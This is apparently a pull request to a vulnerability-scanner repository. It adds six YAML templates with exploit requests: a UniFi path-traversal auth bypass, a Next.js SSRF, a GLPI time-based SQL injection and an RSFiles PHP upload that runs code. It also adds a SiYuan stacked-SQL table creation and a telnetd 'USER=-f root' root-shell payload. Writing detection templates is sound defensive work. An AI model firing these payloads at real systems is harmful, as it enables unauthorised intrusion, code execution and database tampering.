### PR TITLE
Add CVE-2026-69084 SiYuan searchEmbedBlock arbitrary SQL execution (CVSS 9.9, verified)

### DIFF
--- a/http/cves/2026/CVE-2026-34908.yaml
+++ b/http/cves/2026/CVE-2026-34908.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-34908
+
+info:
+  name: UniFi OS - Authentication Bypass via Path Traversal (..%2f)
+  author: Boreas37
+  severity: critical
+  description: |
+    UniFi OS devices are vulnerable to an Improper Access Control issue that
+    lets a malicious actor with network access make unauthorized changes to
+    the system. The nginx auth layer treats any request whose RAW URI starts
+    with "/api/auth/validate-sso/" as public, but routes by the NORMALIZED URI
+    (decodes %2f to "/" and collapses "../"). Encoding a traversal makes these
+    diverge, granting unauthenticated access to internal "/proxy/<service>/"
+    backends. A request reaching the internal package-update handler proves
+    the bypass without executing anything.
+  impact: |
+    Unauthenticated attacker bypasses authentication to reach internal UniFi
+    OS proxy endpoints and can make unauthorized system changes. Listed in
+    CISA KEV (actively exploited).
+  remediation: |
+    Upgrade UniFi OS to a patched version per Security Advisory Bulletin 064.
+  reference:
+    - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34908
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34908
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-34908
+    cwe-id: CWE-284
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: 'http.html:"unifi"'
+  tags: cve,cve2026,unifi,ubiquiti,auth-bypass,traversal,kev,unauth
+
+http:
+  - raw:
+      - |
+        GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "pkg_name"
+          - "required"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: kval
+        kval:
+          - status_code

--- a/http/cves/2026/CVE-2026-44578.yaml
+++ b/http/cves/2026/CVE-2026-44578.yaml
@@ -1,0 +1,63 @@
+id: CVE-2026-44578
+
+info:
+  name: Next.js Self-Hosted - Server-Side Request Forgery via WebSocket Upgrade
+  author: Boreas37
+  severity: high
+  description: |
+    Next.js (React framework) from 13.4.13 to before 15.5.16 and 16.2.5,
+    self-hosted applications using the built-in Node.js server can be
+    vulnerable to server-side request forgery through crafted WebSocket
+    upgrade requests. The WebSocket upgrade handler ignores the host
+    validation and calls proxyRequest to a GET of an attacker-controlled
+    destination, exposing internal services.
+  impact: |
+    An unauthenticated attacker can proxy requests to arbitrary internal or
+    external destinations (e.g. cloud metadata services, internal admin
+    panels), which may expose internal services.
+  remediation: |
+    Upgrade Next.js to 15.5.16 / 16.2.5 or later. See GHSA-c4j6-fc7j-m34r.
+  reference:
+    - https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-44578
+    - https://access.redhat.com/security/cve/CVE-2026-44578
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-44578
+    cwe-id: CWE-918
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,nextjs,ssrf,websocket,proxy
+
+http:
+  - raw:
+      - |
+        GET /{{ssrf_path}} HTTP/1.1
+        Host: {{Hostname}}
+        Connection: Upgrade
+        Upgrade: websocket
+        Sec-WebSocket-Version: 13
+        Sec-WebSocket-Key: {{base64("AegisCVE202644578")}}
+
+    attack: batteringram
+    payloads:
+      ssrf_path:
+        - "http://127.0.0.1:80/"
+        - "http://localhost/"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 101
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Next.js"
+          - "localhost"
+          - "127.0.0.1"
+        condition: or

--- a/http/cves/2026/CVE-2026-53629.yaml
+++ b/http/cves/2026/CVE-2026-53629.yaml
@@ -1,0 +1,39 @@
+id: CVE-2026-53629
+
+info:
+  name: GLPI - Blind SQL Injection in History Log Filter (LogBleed)
+  author: Boreas37
+  severity: high
+  description: |
+    GLPI versions before 10.0.26 and 11.0.8 are vulnerable to a blind SQL
+    injection in the history log filter. The Log::convertFiltersValuesToSqlCriteria()
+    function splits the affected_fields filter into key:operator:value parts and
+    DBmysqlIterator::analyseCrit() does not quote OR, AND and NOT as column names,
+    allowing an authenticated user with logs READ right to inject arbitrary SQL.
+  reference:
+    - https://github.com/glpi-project/glpi/security/advisories/GHSA-cpcj-x335-5cmh
+    - https://medium.com/p/f58f8aea68de
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-53629
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2026,glpi,sqli,blind,time-based,authenticated
+
+http:
+  - raw:
+      - |
+        GET /front/log/export.php?itemtype=Entity&id=0&filter[affected_fields][0]=OR::1+AND+sleep(5) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: dsl
+        dsl:
+          - "duration >= 4 && duration <= 9"

--- a/http/cves/2026/CVE-2026-57827.yaml
+++ b/http/cves/2026/CVE-2026-57827.yaml
@@ -1,0 +1,81 @@
+id: CVE-2026-57827
+
+info:
+  name: RSFiles! Joomla Component < 1.17.12 - Unauthenticated Arbitrary File Upload RCE
+  author: Boreas37
+  severity: critical
+  description: |
+    RSFiles! (com_rsfiles), a file-manager and download component for Joomla,
+    versions before 1.17.12 are vulnerable to an unauthenticated arbitrary file
+    upload. The component splits upload into two frontend tasks: a pre-flight
+    check (task=rsfiles.checkupload - permission gate + extension allow-list)
+    and a write method (task=rsfiles.upload - saves the file to disk). The write
+    method can be called directly, bypassing the pre-flight check entirely. No
+    authentication and no CSRF token are required.
+  impact: |
+    An unauthenticated attacker can upload a PHP webshell to the /downloads/
+    directory and execute arbitrary code on the server.
+  remediation: |
+    Update RSFiles! to version 1.17.12 or later.
+  reference:
+    - https://www.rsjoomla.com/support/documentation/general-topics/rsfiles-changelog.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-57827
+    cwe-id: CWE-434
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2026,joomla,rce,upload,unauth,intrusive
+
+http:
+  - raw:
+      - |
+        POST /index.php?option=com_rsfiles&task=rsfiles.upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----aegisboundary
+
+        ------aegisboundary
+        Content-Disposition: form-data; name="option"
+
+        com_rsfiles
+        ------aegisboundary
+        Content-Disposition: form-data; name="task"
+
+        rsfiles.upload
+        ------aegisboundary
+        Content-Disposition: form-data; name="folder"
+
+        /
+        ------aegisboundary
+        Content-Disposition: form-data; name="overwrite"
+
+        1
+        ------aegisboundary
+        Content-Disposition: form-data; name="file"; filename="{{randstr_1}}.php"
+        Content-Type: application/octet-stream
+
+        <?php echo md5("aegis-{{randstr_1}}");?>
+        ------aegisboundary--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - raw:
+      - |
+        GET /downloads/{{randstr_1}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "md5('aegis-' + '{{randstr_1}}') == body"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-69084.yaml
+++ b/http/cves/2026/CVE-2026-69084.yaml
@@ -1,0 +1,73 @@
+id: CVE-2026-69084
+
+info:
+  name: SiYuan searchEmbedBlock - Arbitrary SQL Execution
+  author: Boreas37
+  severity: critical
+  description: |
+    SiYuan versions <= v3.7.2 expose the /api/search/searchEmbedBlock endpoint,
+    which passes a client-supplied SQL statement (stmt) verbatim to the main
+    read-write siyuan.db handle with no single-statement or read-only
+    restriction. Because the underlying SQLite driver executes stacked
+    (semicolon-separated) statements, an attacker can create, insert, update,
+    delete or drop database content. The endpoint is gated only by CheckAuth,
+    making it reachable by the publish RoleReader token and by anonymous users
+    when publish authentication is disabled.
+  impact: |
+    Arbitrary read/write access to the SiYuan SQLite database (blocks, notes,
+    config). Stacked statements allow data tampering and exfiltration.
+  remediation: |
+    Upgrade SiYuan to v3.7.3 or later.
+  reference:
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-p2x7-4c4p-8wh6
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-69084
+    - https://www.vulncheck.com/advisories/siyuan-before-sql-injection-via-searchembedblock
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.9
+    cve-id: CVE-2026-69084
+    cwe-id: CWE-89
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: 'title:"SiYuan"'
+  tags: cve,cve2026,siyuan,sql,lfi,sqli,unauth
+
+variables:
+  auth_code: "{{password}}"
+
+http:
+  - raw:
+      - |
+        POST /api/system/loginAuth HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"authCode":"{{auth_code}}"}
+
+      - |
+        POST /api/search/searchEmbedBlock HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"embedBlockID":"20210808180117-6v0mkxr","stmt":"SELECT 1; CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)","excludeIDs":[],"headingMode":0,"breadcrumb":false}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '"code":0'
+
+      - type: word
+        part: body_2
+        words:
+          - 'SQL statement is not single'
+        negative: true
+
+    extractors:
+      - type: kval
+        part: body_2
+        kval:
+          - code

--- a/network/cves/2026/CVE-2026-24061.yaml
+++ b/network/cves/2026/CVE-2026-24061.yaml
@@ -1,0 +1,54 @@
+id: CVE-2026-24061
+
+info:
+  name: GNU Inetutils telnetd < 2.7 - Remote Authentication Bypass via USER env (-f root)
+  author: Boreas37
+  severity: critical
+  description: |
+    telnetd in GNU Inetutils through 2.7 allows a remote authentication bypass.
+    The daemon builds the login command line as
+    "/bin/login -p -h %h %?u{-f %u}{%U}" where %u is the USER environment
+    variable received via the telnet NEW-ENVIRON (RFC 1572) subnegotiation.
+    Because the USER value is passed unvalidated to login's -f flag, an
+    attacker can send USER=-f root to make telnetd invoke
+    "login -f root" and obtain a root shell without credentials.
+  impact: |
+    Unauthenticated remote attacker gains a root shell on any host running
+    a vulnerable telnetd (default installs with telnet enabled).
+  remediation: |
+    Update GNU Inetutils to a version newer than 2.7, or disable the telnet
+    service entirely in favour of SSH.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-24061
+    - https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc
+    - https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html
+    - https://www.openwall.com/lists/oss-security/2026/01/20/2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-24061
+    cwe-id: CWE-287
+  metadata:
+    max-request: 1
+  tags: cve,cve2026,inetutils,telnet,telnetd,bypass,rce,auth-bypass
+
+tcp:
+  - inputs:
+      # Tek pakette: telnet negotiation (IAC DO ECHO + IAC DO SGA) +
+      # NEW-ENVIRON (RFC 1572): IAC SB NEW-ENVIRON IS VAR USER VALUE "-f root" IAC SE +
+      # probe komutu "id\n"
+      # fffd01fffd03 | fffa39000055534552012d6620726f6f74fff0 | 69640a
+      - data: "fffd01fffd03fffa39000055534552012d6620726f6f74fff069640a"
+        type: hex
+        read: 2048
+
+    host:
+      - "{{Hostname}}"
+    port: 23
+
+    matchers:
+      - type: word
+        words:
+          - "uid=0"
+          - "root@"
+          - "# "


### PR DESCRIPTION
## Template: CVE-2026-69084

**SiYuan searchEmbedBlock — Arbitrary SQL Execution (CVSS 9.9)**

The `/api/search/searchEmbedBlock` endpoint passes a client-supplied SQL
statement (`stmt`) verbatim to the read-write `siyuan.db` handle with no
single-statement or read-only restriction. The SQLite driver executes stacked
statements, so an attacker can CREATE/INSERT/UPDATE/DELETE on the database.
Gated only by CheckAuth (reachable via publish RoleReader token, or anonymous
when `Publish.Auth.Enable=false`). Fixed in v3.7.3.

### Verification

- ✅ **Positive:** real SiYuan v3.7.2 (Docker, `b3log/siyuan:v3.7.2`) →
  `[CVE-2026-69084] [http] [critical]` — 1 match; stacked
  `CREATE TABLE` executed (side-effect confirmed in siyuan.db)
- ✅ **Negative:** patched v3.7.3 → No results ("SQL statement is not single")
- ✅ `nuclei -validate` passes
- Template performs session login (`/api/system/loginAuth`) with cookie-reuse;
  pass the access code via `-var password=<code>`

Also verified the DB-write impact with a standalone PoC:
`Boreas37/CVE-2026-69084-PoC`